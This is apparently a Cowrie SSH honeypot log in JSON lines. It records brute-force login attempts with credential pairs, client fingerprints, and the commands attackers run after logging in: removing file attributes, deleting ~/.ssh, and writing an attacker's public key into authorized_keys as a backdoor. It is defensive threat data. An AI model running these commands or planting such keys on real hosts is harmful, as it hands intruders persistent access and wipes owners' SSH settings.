{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:16.286573Z","src_ip":"182.18.161.165","session":"ae35f9cb4bda"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:17.340750Z","src_ip":"182.18.161.165","session":"ae35f9cb4bda"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:17.595726Z","src_ip":"182.18.161.165","session":"61e7fbc54b92"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:17.597049Z","src_ip":"182.18.161.165","session":"ae35f9cb4bda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38914,"dst_ip":"1.2.3.4","dst_port":22,"session":"d88286db802d","protocol":"ssh","message":"New connection: 212.227.235.229:38914 (1.2.3.4:22) [session: d88286db802d]","sensor":"my-vps","timestamp":"2025-09-08T23:46:38.758054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:38.758722Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:39.229120Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.login.success","username":"root","password":"p4ssw0rd","message":"login attempt [root/p4ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:40.556221Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:41.581931Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:41.582826Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:46:41.583762Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:41.906238Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:46:42.770763Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:46:42.771574Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:46:43.096282Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:43.097261Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38930,"dst_ip":"1.2.3.4","dst_port":22,"session":"58d378ad1055","protocol":"ssh","message":"New connection: 212.227.235.229:38930 (1.2.3.4:22) [session: 58d378ad1055]","sensor":"my-vps","timestamp":"2025-09-08T23:46:43.628078Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:43.651757Z","src_ip":"212.227.235.229","session":"58d378ad1055"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:43.969550Z","src_ip":"212.227.235.229","session":"58d378ad1055"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:46:45.241656Z","src_ip":"212.227.235.229","session":"58d378ad1055"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:46.567318Z","src_ip":"212.227.235.229","session":"58d378ad1055"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54194,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7e322b55c76","protocol":"ssh","message":"New connection: 212.227.235.229:54194 (1.2.3.4:22) [session: f7e322b55c76]","sensor":"my-vps","timestamp":"2025-09-08T23:46:46.882152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:46.888460Z","src_ip":"212.227.235.229","session":"f7e322b55c76"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:47.203645Z","src_ip":"212.227.235.229","session":"f7e322b55c76"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:46:48.552844Z","src_ip":"212.227.235.229","session":"f7e322b55c76"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:48.869480Z","src_ip":"212.227.235.229","session":"d88286db802d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:48.871223Z","src_ip":"212.227.235.229","session":"f7e322b55c76"}
{"eventid":"cowrie.session.connect","src_ip":"46.101.8.63","src_port":35682,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c912fbfefaa","protocol":"ssh","message":"New connection: 46.101.8.63:35682 (1.2.3.4:22) [session: 2c912fbfefaa]","sensor":"my-vps","timestamp":"2025-09-08T23:46:53.973661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:46:53.974415Z","src_ip":"46.101.8.63","session":"2c912fbfefaa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:46:53.998096Z","src_ip":"46.101.8.63","session":"2c912fbfefaa"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"1234567890","message":"login attempt [nexus/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:46:54.132765Z","src_ip":"46.101.8.63","session":"2c912fbfefaa"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:46:55.159270Z","src_ip":"46.101.8.63","session":"2c912fbfefaa"}
{"eventid":"cowrie.session.connect","src_ip":"93.113.63.124","src_port":45842,"dst_ip":"1.2.3.4","dst_port":22,"session":"72ed08e53962","protocol":"ssh","message":"New connection: 93.113.63.124:45842 (1.2.3.4:22) [session: 72ed08e53962]","sensor":"my-vps","timestamp":"2025-09-08T23:47:13.128926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:13.129612Z","src_ip":"93.113.63.124","session":"72ed08e53962"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:13.266424Z","src_ip":"93.113.63.124","session":"72ed08e53962"}
{"eventid":"cowrie.login.failed","username":"backuppc","password":"backuppc","message":"login attempt [backuppc/backuppc] failed","sensor":"my-vps","timestamp":"2025-09-08T23:47:13.586229Z","src_ip":"93.113.63.124","session":"72ed08e53962"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:14.689969Z","src_ip":"93.113.63.124","session":"72ed08e53962"}
{"eventid":"cowrie.session.connect","src_ip":"45.150.34.92","src_port":42044,"dst_ip":"1.2.3.4","dst_port":22,"session":"b74711c26708","protocol":"ssh","message":"New connection: 45.150.34.92:42044 (1.2.3.4:22) [session: b74711c26708]","sensor":"my-vps","timestamp":"2025-09-08T23:47:17.253182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:17.254181Z","src_ip":"45.150.34.92","session":"b74711c26708"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:17.272233Z","src_ip":"45.150.34.92","session":"b74711c26708"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1","message":"login attempt [oracle/1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:47:17.384640Z","src_ip":"45.150.34.92","session":"b74711c26708"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:18.404734Z","src_ip":"45.150.34.92","session":"b74711c26708"}
{"eventid":"cowrie.session.connect","src_ip":"182.18.161.165","src_port":34786,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a0abc8fb4c1","protocol":"ssh","message":"New connection: 182.18.161.165:34786 (1.2.3.4:22) [session: 6a0abc8fb4c1]","sensor":"my-vps","timestamp":"2025-09-08T23:47:31.391762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:47:31.392610Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:47:31.652219Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqq0000","message":"login attempt [root/qqqq0000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:47:32.732988Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:47:33.271924Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:47:33.272616Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:47:33.273918Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:47:33.535524Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:47:34.160430Z","src_ip":"182.18.161.165","session":"6a0abc8fb4c1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 